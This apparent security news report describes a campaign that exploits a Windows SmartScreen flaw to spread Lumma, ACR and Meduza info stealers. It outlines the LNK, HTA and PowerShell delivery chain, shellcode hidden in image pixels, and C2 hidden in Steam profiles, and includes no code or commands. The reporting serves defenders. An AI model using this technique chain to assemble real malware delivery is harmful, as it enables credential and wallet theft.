Several threat actors have exploited the CVE-2024-21412 vulnerability within the Windows SmartScreen feature to deliver info stealers such as Lumma, ACR and Meduza Stealer in Thailand, Spain, and the United States.
According to researchers, the attack begins with victims being tricked into clicking on a crafted link. This link directs them to a URL file, which downloads an LNK file. This LNK file is instrumental, as it downloads an executable file containing a hidden HTA script.
Upon execution, this script decodes and decrypts PowerShell code, retrieving additional malicious components, including decoy PDF files and a shell code injector.
“Initially, attackers lure victims into clicking a crafted link to a URL file designed to download an LNK file. The LNK file then downloads an executable file containing an HTA script. Once executed, the script decodes and decrypts PowerShell code to retrieve the final URLs, decoy PDF files, and a malicious shell code injector,” researchers said.
Researchers observed that threat actors designed the infection process meticulously. The initial LNK file uses the ‘forflies’ command to invoke PowerShell and executes ‘mshta’ to fetch an execution file from a remote server. Once the HTA script runs, it minimises windows and avoids taskbar visibility, thus staying under the radar while executing further malicious actions.
The attackers have tailored their approach to different regions, including North America, Spain, and Thailand, by using various PDF files as decoys. These files distract the victim while the real malicious activities occur in the background.
Researchers have observed two types of injectors in the campaign: one using image files to obtain shell code and another employing direct shell code injection techniques.
The first injector variant downloads a PNG file from the Imhghippo website, utilising the ‘GdipBitmapGetPixel’ Windows API to decode shell code from the image pixels. It then uses a series of Windows API functions to perform shell code injection. The second variant decrypts its code directly from the data section and employs several Windows API calls for shell code injection, making it simpler but effective.
The ultimate goal of this campaign is to deploy stealer malware, such as Meduza Stealer version 2.9 and ACR Stealer. This malware targets various applications, including browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.
The Meduza Stealer communicates with its command and control (C2) server, hidden using techniques like dead drop resolvers (DDR) on legitimate platforms such as the Steam community website.
By embedding C2 server information within seemingly harmless community profiles, the stealer can maintain communication with its operators and fetch configuration data crucial for its operation. This data includes target specifics and operational parameters, allowing the malware to adapt and continue its malicious activities undetected.
Researchers have urged users to implement robust security measures and continuously monitor digital assets. They are also advised to exercise caution while downloading files from unofficial sources.
“This campaign primarily targets CVE-2024-21412 to spread LNK files for downloading execution files that embed HTA script code within their overlays. The HTA script runs silently, avoiding any pop-up windows, and clandestinely downloads two files: a decoy PDF and an execution file designed to inject shell code, setting the stage for the final stealers,” researchers concluded.
In the News: Meta claims open-source Llama 3.1 is “world’s largest” model
